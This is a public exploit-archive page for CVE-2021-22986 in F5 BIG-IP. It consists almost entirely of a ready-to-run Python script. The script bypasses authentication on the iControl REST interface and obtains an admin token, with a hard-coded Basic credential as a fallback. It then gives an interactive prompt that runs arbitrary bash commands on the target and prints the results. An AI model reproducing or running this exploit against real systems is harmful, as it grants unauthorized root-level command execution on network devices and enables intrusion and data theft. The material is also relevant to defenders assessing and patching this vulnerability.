F5 BIG-IP 16.0.x Remote Code Execution

2021.04.03
Credit: Al1ex
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) # Exploit Author: Al1ex # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 # CVE : CVE-2021-22986 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import sys def title(): print(''' ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex ''') def exploit(url): target_url = url + '/mgmt/shared/authn/login' data = { "bigipAuthCookie":"", "username":"admin", "loginReference":{"link":"/shared/gossip"}, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"} } headers = { "User-Agent": "hello-world", "Content-Type":"application/x-www-form-urlencoded" } response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) if "/mgmt/shared/authz/tokens/" not in response.text: print('(-) Get token fail !!!') print('(*) Tested Method 2:') header_2 = { 'User-Agent': 'hello-world', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data_2 = { "command": "run", "utilCmdArgs": "-c whoami" } check_url = url + '/mgmt/tm/util/bash' try: response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) if response2.status_code == 200 and 'commandResult' in response2.text: while True: cmd = input("(:CMD)> ") data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)} r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) if r.status_code == 200 and 'commandResult' in r.text: print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) except Exception: print('ERROR Connect') print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])) while True: cmd = input("(:CMD)> ") headers = { "Content-Type": "application/json", "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]) } data_json = { "command": "run", "utilCmdArgs": "-c \'%s\'"%(cmd) } exp_url= url + '/mgmt/tm/util/bash' exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) if exp_req.status_code == 200 and 'commandResult' in exp_req.text: print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1])


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top